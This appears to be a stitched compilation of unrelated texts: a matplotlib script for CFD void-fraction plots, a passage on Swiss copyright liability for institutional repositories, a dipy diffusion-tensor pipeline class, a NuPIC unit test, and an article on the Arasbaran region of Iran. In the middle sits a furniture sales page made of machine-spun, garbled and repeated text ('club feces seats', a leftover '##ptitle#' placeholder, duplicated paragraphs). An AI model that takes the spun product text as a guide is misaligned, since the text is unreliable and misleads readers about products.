# Python imports
#----------------
import os
import sys
import numpy
import math
import matplotlib.pyplot as plt
from matplotlib import ticker #Manually change number of tick
import matplotlib.patches as patches
#----------------
#================================
# USER DEFINED VARIABLES
#================================
pdf=False
tol=1e-4
paperMode=True
impeller=True
impellerType="pbtTs4"
contour=False
nContour=100
colorList=["c","m","g","r","b", "k","c","m","g","r","b","k"]
aval=0.5
#Functions for the averaging
from functionAverage import *
#===============================
# FIGURE OPTIONS
#===============================
#Figure size
plt.rcParams['figure.figsize'] = 17, 8
params = {'backend': 'ps',
'axes.labelsize': 26,
'axes.titlesize': 26,
'text.fontsize': 20,
'legend.fontsize': 20,
'xtick.labelsize': 22,
'ytick.labelsize': 22,
'text.usetex': True,
}
plt.rcParams.update(params)
#================================
# MAIN
#================================
try:
folder = sys.argv[1:]
except:
print "Insufficient number of arguments, need a folder argument"
# Acquire list of time step
speedFolder=folder
# Sort so that speed will already be sorted
speedFolder.sort()
fig = plt.figure(figsize=(6,8))
ax = fig.add_subplot(111)
for j,i in enumerate(speedFolder):
subFolder=i +"/CFD/resultsCFD/postProcessing/probes"
time=os.listdir(subFolder)
fname = subFolder+"/"+max(time)+"/"+"voidfraction"
print "Postprocessing file : ", fname
rl,zl,acc,dev=scalarAverage(fname,impeller,impellerType)
extent=(numpy.min(rl),numpy.max(rl),numpy.min(zl),numpy.max(zl))
if (j==0):
accAll=acc
levels = (0.,1.) # numpy.arange(mindiff, maxdiff+tol, (maxdiff-mindiff)/nContour)
CS=plt.contourf(accAll, levels, hold='on',alpha=1, colors="w",origin='lower', extent=extent)
else: accAll=numpy.maximum(acc,accAll)
#plt.subplots_adjust(left=0.02, bottom=0.09, right=0.95, top=0.94, wspace=0.15)
#plt.subplot(1,1,1)
#plt.xlabel("r [m]")
#plt.ylabel("z [m]")
#plt.imshow(acc[:,:],extent=extent,origin='lower',interpolation="bicubic",vmin=0.4,vmax=1.)
#if (len(sys.argv)>3):
# plt.title("%s" %(sys.argv[3]))
#else:
# plt.title("%s" %(sys.argv[1]))
#cbar = plt.colorbar( drawedges=False)
#tick_locator = ticker.MaxNLocator(nbins=7)
#cbar.locator = tick_locator
#cbar.update_ticks()
#cbar.ax.tick_params(labelsize=20)
#cbar.solids.set_edgecolor("face")
maxdiff=numpy.nanmax(acc)
mindiff=numpy.nanmin(acc)
levels = (0,0.5) # numpy.arange(mindiff, maxdiff+tol, (maxdiff-mindiff)/nContour)
CS=plt.contourf(acc, levels, hold='on',alpha=0.5, colors=colorList[j],origin='lower', extent=extent)
CS=plt.contour(acc, levels, hold='on',alpha=1, colors="k", origin='lower', extent=extent)
#plt.clabel(CS, inline=1, fontsize=14,colors="white")
levels = (0.,1.) # numpy.arange(mindiff, maxdiff+tol, (maxdiff-mindiff)/nContour)
CS=plt.contourf(accAll, levels, hold='on',alpha=0.10, colors="y",origin='lower', extent=extent)
# get data you will need to create a "background patch" to your plot
xmin = numpy.min(rl)
xmax = numpy.max(rl)
ymin = numpy.min(zl)
ymax = numpy.max(zl)
xy = (xmin,ymin)
width = xmax - xmin
height = ymax - ymin
# create the patch and place it in the back of countourf (zorder!)
p = patches.Rectangle(xy, width, height, fill=True,color="k",alpha=0.4, zorder=-10)
ax.add_patch(p)
#Get artists and labels for legend and chose which ones to display
handles, labels = ax.get_legend_handles_labels()
display = (0,1,2)
#Create custom artists
a1 = patches.Rectangle((0,0),1,1,color=colorList[0],alpha=aval)
a2 = patches.Rectangle((0,0),1,1,color=colorList[1],alpha=aval)
a3 = patches.Rectangle((0,0),1,1,color=colorList[2],alpha=aval)
a4 = patches.Rectangle((0,0),1,1,color=colorList[3],alpha=aval)
#anyArtist = plt.Line2D((0,1),(0,0), color='k')
ax.legend([handle for i,handle in enumerate(handles) if i in display]+[a1,a2,a3,a4],
[label for i,label in enumerate(labels) if i in display]+["100RPM","200RPM","300RPM","400RPM"])
plt.show()
if (pdf): plt.savefig("./levelAnalysis.pdf")
plt.show()
|
An institutional repository's tasks usually comprise depositing, administering and making accessible to the public documents produced by the institution's scholars or researchers. When a document is submitted to an institutional repository it is not made available online immediately. Rather it must first undergo quality control procedures. The scope of these procedures varies from repository to repository. They can include checking the metadata, key-word indexing and cataloguing, and the evaluation of the content. For more information on quality assurance in electronic archives in general, see Andermann and Degwitz (2004, p. 53 ff.).
The following passages about legal consequences and recourse to the author are from: Hilty, Reto M. and Seemann, M. (2009) Open Access - Access to scientific publications in Swiss law (Expert opinion commissioned by the University of Zurich).
If a repository operator makes scientific works available without holding the necessary copyright, he commits a breach of copyright. In such a case, the copyright holder has at his disposal the legal remedies pursuant to Arts. 61 et seq. of the URG (Swiss Copyright Law). In particular, an action can be brought against the operator for the elimination of the infringement (Art. 62 Para. 1 b, URG). Thus the operator can, for instance, be obliged to remove the work in question from the repository.
Financial consequences are also possible on the basis of actions deriving from the OR (Swiss Code of Obligations), as reserved by Art. 62 Para. 2 of the URG. The obvious measure here is an action for damages with which for instance the publisher can claim the refund of the profit lost through the breach of copyright from the repository operator (Art. 62 Para. 2, URG in conjunction with Arts. 41 et seq., OR). However, the publisher must prove the difference, which is probably difficult in practice because it is hardly possible to establish causality between the activities of the repository operator and the losses incurred by the publisher.
An action can be filed by anyone who holds the infringed copyright subpowers (Art. 62 Para. 1, URG) or who holds an exclusive licence to these powers (Art. 62 Para. 3, URG). The publication of a work in a repository involves the online rights, that are as a matter of principle held by the author or the publisher. Hence it is mostly the author or the publisher that is entitled to file the action.
The defendant can be both the operator of the repository but also any other persons who have participated in the copyright infringement. In other words, it is not only the main infringer but also an instigator or an accessory who can be sued (cf. Art. 50 Para. 1, OR). If the online rights to a work are held for instance by a publisher, and if the author has nevertheless published his work in a repository, an action can be brought both against the operator of the repository and against the author. In the case of a claim for damages, the operator and the author are jointly and severally liable (Art. 50 Para. 1, OR). The plaintiff can choose the defendant against whom he wishes to proceed and whether to claim a whole or a part of the losses from this person (Art. 144 Para. 1, OR).
The repository operator can by contract transfer to the author the risk of being sued for damages by third parties for infringement of rights. This is done by means of a contractual clause in which the author undertakes to indemnify the repository operator in the event of third-party claims, i.e. to assume the costs incurred and any damages payable.
From a practical point of view, it should be noted that such a transfer of the risk to the author can reduce the attractiveness of the repository and that there might be fewer authors willing to make their work publicly accessible in the repository. The publishing contract between the author and the publisher does not always make it immediately clear whether the author is authorised to deposit the work in a repository in parallel with publication. For this reason, the manner in which liability for infringements of rights is distributed is a central aspect of the agreement between the author and the repository operator.
If the repository operator and the author have not included a provision in the agreement dealing with liability for rights infringements, the repository operator can only have recourse to the author to the extent that the latter is jointly responsible for the copyright infringement (and to this extent can also be sued directly). Such a joint responsibility applies as a matter of principle if the deposit is made by the author himself or with his consent. The shares to be assumed by the repository operator and the author are determined by judicial discretion in the specific case (Art. 5 Para. 2, OR).
The repository operator is to be classified as a content provider, whose performance goes beyond mere technical storage and making available as provided by a purely access provider. However, even the content provider is only subject to liability to the extent that he has failed to take possible and reasonable measures to prevent infringements of rights. The repository operator can be expected to clarify the copyright entitlement to the individual works and to attempt to remedy any infringement of rights. However, the repository operator could not additionally be expected to acquire knowledge of the content of each individual work and to examine it for infringements.
Self-archiving in the sense of self-posting refers to the individual, non-standardised archiving and making available to the public of publications, for example on a faculty, institute or private website.
The main breaches of rights that can occur when self-posting are the infringement of intellectual property rights, for example third-party copyrights, and the violation of privacy rights. When university staff members self-archive their works on their personal websites, the question of the university's liability does not arise provided the university does not operate these websites and is not responsible for their contents.
|
import dipy.core.gradients
import dipy.reconst.dti
import dipy.segment.mask
import dipy.reconst.dti
import numpy
import nibabel
from core.generictask import GenericTask
from lib.images import Images
__author__ = 'desmat'
class TensorDipy(GenericTask):
def __init__(self, subject):
GenericTask.__init__(self, subject, 'upsampling', 'registration', 'qa')
def implement(self):
dwi = self.getUpsamplingImage('dwi', 'upsample')
bValsFile = self.getUpsamplingImage('grad', None, 'bvals')
bVecsFile = self.getUpsamplingImage('grad', None, 'bvecs')
mask = self.getRegistrationImage('mask', 'resample')
fit = self.__produceTensors(dwi, bValsFile, bVecsFile, mask)
def __produceTensors(self, source, bValsFile, bVecsFile, mask):
self.info("Starting tensors creation from dipy on {}".format(source))
dwiImage = nibabel.load(source)
maskImage = nibabel.load(mask)
maskData = maskImage.get_data()
dwiData = dwiImage.get_data()
dwiData = dipy.segment.mask.applymask(dwiData, maskData)
gradientTable = dipy.core.gradients.gradient_table(numpy.loadtxt(bValsFile), numpy.loadtxt(bVecsFile))
model = dipy.reconst.dti.TensorModel(gradientTable)
fit = model.fit(dwiData)
tensorsValues = dipy.reconst.dti.lower_triangular(fit.quadratic_form)
correctOrder = [0,1,3,2,4,5]
tensorsValuesReordered = tensorsValues[:,:,:,correctOrder]
tensorsImage = nibabel.Nifti1Image(tensorsValuesReordered.astype(numpy.float32), dwiImage.get_affine())
nibabel.save(tensorsImage, self.buildName(source, "tensor"))
nibabel.save(nibabel.Nifti1Image(fit.fa.astype(numpy.float32), dwiImage.get_affine()), self.buildName(source, "fa"))
nibabel.save(nibabel.Nifti1Image(fit.ad.astype(numpy.float32), dwiImage.get_affine()), self.buildName(source, "ad"))
nibabel.save(nibabel.Nifti1Image(fit.rd.astype(numpy.float32), dwiImage.get_affine()), self.buildName(source, "rd"))
nibabel.save(nibabel.Nifti1Image(fit.md.astype(numpy.float32), dwiImage.get_affine()), self.buildName(source, "md"))
nibabel.save(nibabel.Nifti1Image(fit.evecs[0].astype(numpy.float32), dwiImage.get_affine()), self.buildName(source, "v1"))
nibabel.save(nibabel.Nifti1Image(fit.evecs[1].astype(numpy.float32), dwiImage.get_affine()), self.buildName(source, "v2"))
nibabel.save(nibabel.Nifti1Image(fit.evecs[2].astype(numpy.float32), dwiImage.get_affine()), self.buildName(source, "v3"))
#nibabel.save(nibabel.Nifti1Image(fit.adc(dipy.data.get_sphere('symmetric724')).astype(numpy.float32),
# dwiImage.get_affine()), self.buildName(target, "adc"))
faColor = numpy.clip(fit.fa, 0, 1)
rgb = dipy.reconst.dti.color_fa(faColor, fit.evecs)
nibabel.save(nibabel.Nifti1Image(numpy.array(255 * rgb, 'uint8'), dwiImage.get_affine()), self.buildName(source, "tensor_rgb"))
self.info("End tensor and metrics creation from dipy, resulting file is {} ".format(fit))
return fit
def isIgnore(self):
return self.get("ignore")
def meetRequirement(self):
return Images((self.getUpsamplingImage('dwi', 'upsample'), "upsampled diffusion"),
(self.getUpsamplingImage('grad', None, 'bvals'), "gradient value bvals encoding file"),
(self.getUpsamplingImage('grad', None, 'bvecs'), "gradient vector bvecs encoding file"),
(self.getRegistrationImage('mask', 'resample'), 'brain mask'))
def isDirty(self):
return Images((self.getImage("dwi", "tensor"), "dipy tensor"),
(self.getImage('dwi', 'v1'), "selected eigenvector 1"),
(self.getImage('dwi', 'v2'), "selected eigenvector 2"),
(self.getImage('dwi', 'v3'), "selected eigenvector 3"),
(self.getImage('dwi', 'fa'), "fractional anisotropy"),
(self.getImage('dwi', 'md'), "mean diffusivity MD"),
(self.getImage('dwi', 'ad'), "selected eigenvalue(s) AD"),
(self.getImage('dwi', 'rd'), "selected eigenvalue(s) RD"))
#"apparent diffusion coefficient" : self.getImage(self.workingDir, 'dwi', 'adc')}
def qaSupplier(self):
"""Create and supply images for the report generated by qa task
"""
qaImages = Images()
softwareName = 'dipy'
#Get images
mask = self.getRegistrationImage('mask', 'resample')
#Build qa images
tags = (
('fa', 'Fractional anisotropy'),
('ad', 'Axial Diffusivity'),
('md', 'Mean Diffusivity'),
('rd', 'Radial Diffusivity'),
)
for postfix, description in tags:
image = self.getImage('dwi', postfix)
if image:
qaImage = self.buildName(image, softwareName, 'png')
self.slicerPng(image, qaImage, boundaries=mask)
qaImages.extend(Images((qaImage, description)))
return qaImages
|
Great! Economy Prep Table top design By Advance Tabco. Economy Prep Table very well made, sleek and simple. Complete your living room furniture with a modern Economy Prep Table. Its good looking sturdy, attractivce and it looks expensive and a best value for the money. Economy Prep Table is one of the most homey, cozy, nice look and exotic Economy Prep Table especially for the price and made of excellent products. Great quality, easy to assemble, delivery on time and in best condition. Economy Prep Table is good merchandise at fair prices and wonderful free shipping. Guarantee damaged claim by offering to send parts or to keep the item at a discounted price. Great buy would definitely recommend. Shop with our low-price guarantee and find great deals on ##ptitle# and more!. Reading the reviews helped you purchase.
A very common piece of furniture home based is the club stool. They are available in handy in all kinds of locations, from the kitchen area to the porch towards the bar. Bar stools are not just for the club anymore. Increasingly more homes ask them to as furnishings. The truly amazing advantage of a bar stool is the fact that its peak allows you to sit right in the counter peak. For those who have a large kitchen with an island inside it, a few bar stools allow you to change that isle right into a breakfast table or perhaps a spot to unwind and read the paper. There are various types of bar equipment that you can get when going for some on the market. That's the location a problem begins since you will be baffled on which one that is best for you. But we've restricted the extension of the kinds of barstools that you could buy and apply. Thankfully, we as of now did the research for you personally, as well as in this list we created a list of the very best 10 best club feces seats evaluations in 2018 you can purchase for the club. Once you audit their list, you will easily have the capacity to purchase the correct barstools for you personally.
This luxurious set of urban-chic couches is made to supply an embellished site. In fact, even your modest rooms might have you required to have an perfect film evening. Lay him lower to get a completely altered bed. This avant-garde person futon mattress is obtainable in various tones. This includes some vibrant shades out of control for example Lemon, Mild Blue, and lightweight Crimson. Put them inside your inventive research or loft to assess the exuberance. It's also available in decreasing shades such as darkish, darkish and dark. These nuances, once more, printing a respectable aspect of the upper class. With the breaking component of your back, you are able to relaxation to your favorite position. This sofa looks wealthy with tufted material consistency upholstery. Fortunately that it is personalized with hypo-allergenic filling up. A conclusive outcome provides a comfortable relaxation.
Does your room show space requirements? Are you currently willing to throw a sleep celebration within the mild of the absence of space to rest? This DHP Futon mattress could be ideal for you in this situation. This Futon sofa by DHP incorporates the functionality of the sofa mattress with a contemporary and elegant appearance. Put it inside your living room to achieve an extra sleepy mattress at night. A microfiber ground that became popular in the middle will be a ideal mixture. This amazing couch accompanies a tapestry with shiny stainless hair and legs. Consolidating these outcomes together inside a comfortable popular style couch. You can choose to get it in Fake Leather-based, Velvet or Bed linen. A component that is really worth specifying is its back style. Considering the various seats, DHP encourages the alteration from the sofa for your comfort and ease amounts. You can gain levels to have an animated babble, or silent shifting image night.
With almost 100 5-star evaluations, this lying loveseat is recommended for its comfort and ease, sturdiness, appearance and easy set up. In addition to soft, but supportive soft cushions, it provides a sliding system, so that you can place your ft up and rock (though, not simultaneously.) Upholstered with extremely-long lasting bonded leather-based, this reclining loveseat will resist tears, releases and stainswhich is a great thing, because it also includes a storage space area system (where one can hide your snacks, obviously) along with a two-mug holder. Whether you are deciding in for a Netflix excessive or watching football together with your team, this lying loveseat offers the durability and comfort without emptying your wallet.
Does your living space show space needs? Are you currently willing to toss a sleep celebration in the light of the lack of space to rest? This DHP Futon mattress could be well suited for you in this situation. This Futon mattress sofa by DHP incorporates the functionality of the sofa bed having a modern and elegant look. Put it in your living room to attain an additional sleepy mattress during the night. A micro-fiber ground that became popular in the middle will be a perfect combination. This unique sofa comes with a tapestry with shiny chrome locks and legs. Bringing together these outcomes together in a comfy well-liked style sofa. You may choose to get it in Faux Leather, Velvet or Bed linen. An element that's really worth specifying is its back style. Considering the different seats, DHP encourages the progres of the sofa to your comfort and ease amounts. You can gain levels to have an animated babble, or quiet shifting image evening.
With nearly 100 5-star reviews, this reclining loveseat is touted for its comfort and ease, sturdiness, look and ease of assembly. Along with gentle, but encouraging soft cushions, it provides a sliding system, so you can place your ft up and rock and roll (though, not at the same time.) Padded with extremely-long lasting bonded leather, this lying loveseat will avoid holes, rips and stainswhich is a good factor, because it also features a storage compartment console (where you can conceal your snacks, obviously) along with a two-mug owner. Regardless of whether youre settling set for a Blockbuster online binge or viewing soccer with your team, this reclining loveseat offers the durability and comfort without breaking the bank.
Carolina Light Grey Fabric Sectional Couch is celebrated for its stunning comfort and remarkable style. It features a modular style that allows for several agreement options to meet your requirements.The established functions gentle fabric and pushes cushions to bring about the specified comfort. More to the point, its of the great dimension to support you together with the group of friends. With respect to the space as well as your preferred shape, you are able to combine the I seats to create a remarkable form. Its highly recommended for all those with little rooms and needs a couch.
The Bridgewater is a sofa design that is primarily casual and definitely comfortable. This style is the darling of many a designer simply because it can be used to create a casual, pleasant space. Bridgewater couches are flexible, depending on the furniture you choose. Done in an unbiased material, this kind of couch doesnt contend with other elements within the room that may be much more remarkable, for example artwork or any other large functions. Much more formal material will produce a far more grand style of couch. A number of characteristics distinguish Bridgewater sofas: Typically they've reduced hands along with a high back again, which contributes to the casual appear. Most also have a customized dress that hides the legs and loose cushions for the seat and back. This particular design was created to accommodate slipcovers, which also lend an informal air to the sofa.
The word here is the comfort and ease and sophisticated appear. This set includes a tufted back rest and nail head accent that provides the subtle appear. Its gray colour adds to its impressive look. It can match up to 8 in . bed mattress. That alone tells you how comfy the set can be. Notably, it doesn't include a mattress. So you may need to purchase one. The trundle includes a castor to allow quick access. You may also draw the trundle that people sit on. Simply to mention, it should take putting together, but again its super easy to assemble.
The Bridgewater is really a sofa design that's primarily casual and certainly comfy. This style may be the beloved of many a designer simply because you can use it to create a casual, friendly space. Bridgewater couches are versatile, with respect to the furniture you choose. Completed in a neutral fabric, this style of sofa doesnt contend with additional factors in the room which may be much more remarkable, for example art work or other big functions. More formal fabric will produce a more grand type of sofa. A number of qualities distinguish Bridgewater sofas: Usually they have low hands along with a high back again, which plays a role in the sporadic look. Most in addition have a customized dress that hides the legs and free soft cushions for the seat and back. This particular design was created to accommodate slipcovers, that also give an informal air towards the couch.
This extremely-elegant, higher-sovereign couch is designed to assistance reducing-edge living room innovation. It's produced like a 2-piece sofa sofa coupled with a beautiful chair. Additionally, it offers cellular armrests and beneficial back again support. The beautiful tapestry is completed with dark fake leather, firmly tufted. You are able to feel comfortable padding with froth inside the seat soft cushions. This guarantees a fragile feeling when you relaxation after a monotonous day. The couch is reinforced with wooden edge engrossed in darkish artificial leather-based. Fake tufted leather and strong pinus radiata give severe brightness. It is a fact that it takes a second look since it is more expensive of computer truly seems to be. Talking about dimension, its huge! This is exactly what provides much more superstars for this set. The peak can also be impressive for tall and short people.
Copyright © Economy Prep Table By Advance Tabco in Recliners All right reserved.
|
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have purchased from
# Numenta, Inc. a separate commercial license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Unit tests for model selection via cluster params."""
import unittest
from nupic.support.unittesthelpers.testcasebase import TestCaseBase
from nupic.frameworks.opf.modelfactory import ModelFactory
from nupic.frameworks.opf.clamodel import CLAModel
from nupic.frameworks.opf.common_models.cluster_params import (
getScalarMetricWithTimeOfDayAnomalyParams)
class ClusterParamsTest(TestCaseBase):
def testModelParams(self):
"""
Test that clusterParams loads returns a valid dict that can be instantiated
as a CLAModel.
"""
params = getScalarMetricWithTimeOfDayAnomalyParams([0],
minVal=23.42,
maxVal=23.420001)
encodersDict= (
params['modelConfig']['modelParams']['sensorParams']['encoders'])
model = ModelFactory.create(modelConfig=params['modelConfig'])
self.assertIsInstance(model,
CLAModel,
"JSON returned cannot be used to create a model")
# Ensure we have a time of day field
self.assertIsNotNone(encodersDict['c0_timeOfDay'])
# Ensure resolution doesn't get too low
if encodersDict['c1']['type'] == 'RandomDistributedScalarEncoder':
self.assertGreaterEqual(encodersDict['c1']['resolution'], 0.001,
"Resolution is too low")
# Ensure tm_cpp returns correct json file
params = getScalarMetricWithTimeOfDayAnomalyParams([0], tmImplementation="tm_cpp")
self.assertEqual(params['modelConfig']['modelParams']['tpParams']['temporalImp'], "tm_cpp",
"Incorrect json for tm_cpp tmImplementation")
# Ensure incorrect tmImplementation throws exception
with self.assertRaises(ValueError):
getScalarMetricWithTimeOfDayAnomalyParams([0], tmImplementation="")
if __name__ == '__main__':
unittest.main()
|
Arasbārān (Persian: ارسباران or قرهداغ also Romanized as Arasbārān and formerly known as Qarājadāḡ, Qaradagh, or Qaraja dagh), is a large mountainous area stretching from the Qūshā Dāgh massif, south of Ahar, to the Aras River in East Azerbaijan Province of Iran. The region is confined to Aras River in the north, Meshgin Shahr County and Moghan in the east, Sarab County in the south, and Tabriz and Marand counties in the west. Since 1976, UNESCO has registered 72,460 hectares of the region, confined to 38°40'' to 39°08''N and 46°39'' to 47°02''E, as biosphere reserve with the following general description, This biosphere reserve situated in the north of Iran at the border to Armenia and Azerbaijan belongs to the Caucasus Iranian Highlands. In-between the Caspian, Caucasus and Mediterranean region, the area covers mountains up to 2,200 meters, high alpine meadows, semi-arid steppes, rangelands and forests, rivers and springs. Arasbaran is the territory of about 23,500 nomads who are mainly living in the buffer and transition zones (2000). Economic activities in the biosphere reserve are mainly agriculture, animal husbandry, horticulture, apiculture, handicrafts and tourism, but business activities can also be found in urbanized areas.
4.1.2 Toğs; relics of Ashura day?
There is no mention of Arasbaran as a geo-political entity in written sources dating prior to Safavid era. There is a speculation that the region referred to as Syah Kuh by the 10th-century Muslim geographer, Ibn Hawqal, corresponds to the present day Arasbaran. However, the said Syahkoh has more similarities with Manghishlaq in the eastern shores of Caspian Sea. Therefore, Arasbaran''s history should be considered in the context of its two main towns, Ahar and Kaleybar.
Kaleybar, formerly known as bedh, was the stronghold of Babak Khorramdin who, in 816 AD, revolted against Islamic Caliphate and was defeated in 836 AD. The events of the two decades long tumultuous times have been extensively reported by Islamic historians of the epoch. The first report is by Al-Masudi in The Meadows of Gold: Babak revolted in Bedh region with the disciples of Djavidan ... Following a series of defeats Babak was blockaded in his native town..., which even now is known as Babak''s country. Ibn Athir in his book, The Complete History, has devoted many pages to the description of battles.
Yaqut al-Hamawi, writing in early thirteenth century, describes Kaleybar in the following words, County between Azerbaijan and Erran.... This county produces pomegranates of incomparable beauty, excellent figs and grapes that are dried on fires (because the sun is always obscured by thick clouds). In the 12th-13th centuries, Ahar was a minor and short-lived, but prosperous emirate ruled by the Pishteginid dynasty of Georgian origin (1155—1231). Yaqut al-Hamawi, describes Ahar as very flourishing despite its small extent.
Both towns lost most of their importance during the rule of Ilkhanate. Hamdallah Mustawfi, writing in mid fourteenth century, descries Ahar as a little town, and Kaleybar as A village of Azerbaijan, in the woods near a mountain which comprises a fortress.
Ahar was in the focus of Safavid dynasty''s agenda for casting of Azerbaijan as a Safavid dominion. Thus, Shah Abbas rebuilt the mausoleum of Sheikh Sheikh Shihab-al-din in Ahar.
Arasbaran region suffered enormously during Russo-Persian War (1804–13) and Russo-Persian War (1826–28) due to its proximity to the war zone. Western travelers in 1837-1843 period had found Ahar, a city with around 700 households, in wretched condition.
S.R. Alemohammad, "The book of Arasbaran".
A concise English language article is "The Tribes of Qarāca Dāġ: A Brief History" by P. Oberling.
Encyclopediae Iranica has many articles which are related to Arasbaran.
The declaration by UNESCO of Arasbaran as a UNESCO Biosphere reserve in 1976 was a great endorsement for the region''s ecotourism potential. More recently, visitors from places as far away as Canada have expressed their amazement with approving words. The planned promotion of the Biosphere to the National Park status may farther enhance Arasbaran''s environmental significance.
Arasbaran is home to 215 species of birds, notably Caucasian Black Grouse, Grey Partridge, Black Francolin, and Common Pheasant, 29 species of reptiles, 48 species of mammals, notably wild Goat, wild Boar, Brown Bear, Wolf, Lynx, and Leopard, and 17 species of fish. There is an effort going on to revitalize the extinct sub-species of Caspian red deer local to the area. The local flora include Hornbeam, Sumac, and Berberis. A unique characteristic of Arasbaran forests is the ubiquity of edible wild trees. For instance, a patch of forest between Aghaweye and Oskolou includes hazelnut trees. The large walnut and Cornus mas trees, wildly grown alongside water-streams, provide an important income source for inhabitants. More exotic plant species, such as Redcurrant, Truffle and herbs with application in Traditional medicine significantly add to the ecological importance of Arasbaran region.
A recent study has indicated that three sites have the highest potential for ecotourism. These sites, which are located alongside the road connecting Kaleybar to Asheqlu (Abbasabad-Aynaloo-Vayqan direction), include Mikandi valley, Aynali forests and Babak Castle. There are, however, more unexplored touristic potentials. One example is a holy mountain located at the coordinate (38°55''16.64"N,46°47''24.62"E). Most inhabitants of the now abandoned village, Garmanab, were Izadis, the followers Yârsân religion. They used to slaughter sacrificial animals in the site, which is located at the slopes of a hill. Nobody bothered to ask the reasons behind the holiness of the site. However, the pleasures of an occasional feast was so tempting that the followers of the Shia'' sect attended the holy site, too. Nowadays there is few worshipers and the centuries long tradition are almost forgotten. The revival of these rituals may attract cultural visitors.
Another potential touristic attraction is the summer camps (ییلاق)of semi-settled Tribes of Arasbaran, known as Ilat, who spend the 5 months of year in uplands for grazing their livestock. A tourist, while enjoying the fresh thin air of mountains, may get a chance to observe the age-long traditional living styles of locals. Some of the attractive sites are Aliabad mountains, meadows above Shojaabad, East Azerbaijan village, and Chaparli and Aqdash summer quarters, all located in a driving driving distance from Kaleybar.
Numerous hot springs, scattered all over the region, have been considered as attractions for promoting tourism. One example is Motaalleq Hot spring therapeutic facility, which is the largest of its kind in Iran. The facility, with an area of 12870 m2 includes bathing areas, coffee-shop, restaurants, prayer room, and gymnasium.
In recent years, the local government has organized Zoğal festivals in Kaleybar as a means of promoting tourism. In addition, every year, in the second half of October, a Pomegranate Festival is organized in by the provincial authorities in Mardanaqom village. The main program of the festival is performance of Ashugh music.
Nearly every village in the region has a landmark in its territories. Some of these are potential tourism attractions. For instance, there is a landmark ancient plane tree in the Kavanaq village, whose photo is presented here. The tree is about 3 meter in diameter and is said to have lived for 500 years. The villagers have developed interesting oral narratives around the events experienced by the tree.
In the wake of Russo-Persian War (1804–13) a significant fraction of the inhabitants lived as nomadic tribes (ایلات). The major tribes included; Chalabianlu 1500 tents and houses, Karacurlu 2500, Haji-Alilu 800, Begdillu 200, and various minor groups 500. At the time Ahar, with 3500 inhabitants, was the only city of Qaradağ By the beginning of twentieth century the settlement of tribesman were growing and in 1920 there were more than four hundred villages, less than thirty of which were Armenian. However, the nomadic way of living has survived to the present. Nomadic population at present has been estimated to be about 36000, and is not significantly different from the 30000 estimate of 1960.
The defeat of Azerbaijan People''s Government and the following tragic events, resulted in mass migration of inhabitants to Tabriz and Tehran. Most of these migrants settled in the shanty towns and worked as painters. The land reforms of 1962–1964 accelerated the migration. The case of a typical village, Abbasabad, is a good example to demonstrate the population depletion; the number of families dropped from 60 families at 1970 to 12 at 2006.
After the election of Ahmadinezhad as president of Iran, a rumor was circulated that the UNESCO will compensate the residents to have the village evacuated for the wild-life protection efforts. Some early emigrants returned and built decent houses. At the present the region is undergoing a population boom as more wealthy city residents want to spend their retirement in cleaner environment. Recently, the deputy governor of the East Azarbaijan province has mentioned the phenomenon of reverse migration to Khoda Afarin and Kaleybar counties. The problem is that the population is aging and the working class adults, in the face of scarce job opportunities, live most of the year in large population centers such as Tehran. The issue is so critical that during recent presidential campaign, Mohsen Rezaee referred to Iranian villages as the old age residence.
The spoken language is Azerbaijani, which belongs to the western group of southwestern, or Oghuz, branch of Turkic language family. It has a high degree of intelligibility with Anatolian Turkish. Most inhabitants are familiar with Persian language, which is the official language of Iran and the sole language of education. Until 1980, the elders of four villages (Chay Kandi, Kalasor, Khoynarood, and Arazin) were communicating in Tati, a language which was the Iranian language of Azerbaijan before the arrival of speakers of Turkish in the time of Mahmud of Ghazni (around 1000 A.D.).
The majority of people are followers of Shia Islam. The last Armenian person passed away in 1978. The region is also home to a large number of the followers of the Yarisan religion (Shamloo).
Pahlavi era was a dark period for cultural identity of Arasbaran. Rezā Shāh, insisting on ethnic nationalism and cultural unitarism, implemented his policies of forced detribalization and sedentarization. He renamed Qaradağ as Arasbaran to deny the Turkic identity of the inhabitants. Moreover, the education and publication in Azerbaijani language was banned and writers of Azerbaijan had to write in Farsi, a medium which was, perhaps, not adequate for recording the subtleties of Qaradağ''s native culture that has evolved under influence of Turkish language. This language, has a rare and unusual point of grammar called the hearsay tense. Consequently, in Turkish speaking society the boundary between the private and shared memories becomes fuzzy, and the magnitude of time lapse between the events shrinks. This is an ideal feature for the generation of oral cultural artifacts, particularly mythology, epics and folkloric music.
A rare opportunity for recording and preserving Qaradağ''s culture was provided by the innovative method by which Shahriar in his famous verse book, Heydar Babaya Salam adopted to summarize the Cultural identity in concise poetic form. A generation of lesser known poets from Arasbaran used similar approach for perpetuating region''s oral traditions. Remarkable examples are mourning Sabalan by Abbas Barez, and "Hail to Qizil Qala''h" by Seifollah Delkhon. Another example is Mohamad Golmohamadi''s long poem, titled I am madly in love with Qareh Dagh (قاراداغ اؤلکهسینین گؤر نئجه دیوانهسی ام), which is a concise description of the region''s cultural landscape.
The inhabitants of every village attribute spiritual importance to at multiple sites, scattered throughout the village territory. These places, generally known as Ojaq, are located in areas with rapid variation on the land topography, and are in some way linked to Djins via established narratives. Most of these sites possess any significantly conspicuous landmark. At some sites, which are considered sacred by many villages, people will occasionally gather to slaughter sacrificial animals or offer a simple meal of freshly baked bread and cheese with tea. At some sites, they have collected medium sized rocks around some trees and hang color treads or ribbons from the trees.
In most villages, there are more sites with narrative associations, which are not considered sacred. These sites are in secluded locations formed by natural topography of the landscape. Often the narratives involve bears as the principal subject. The main theme of the narratives is the following. A male bear kidnaps a blackberry picking pretty girl and takes her to his din. A hybrid child is born, but the girl runs away at the first opportunity leaving the lamenting bear entreatingly crying for his lost wife.
According to a myth wolf is found as a symbol of merciless power that is able to destroy everything. If a human being touches it, whatever frightens him/her will be frustrated.
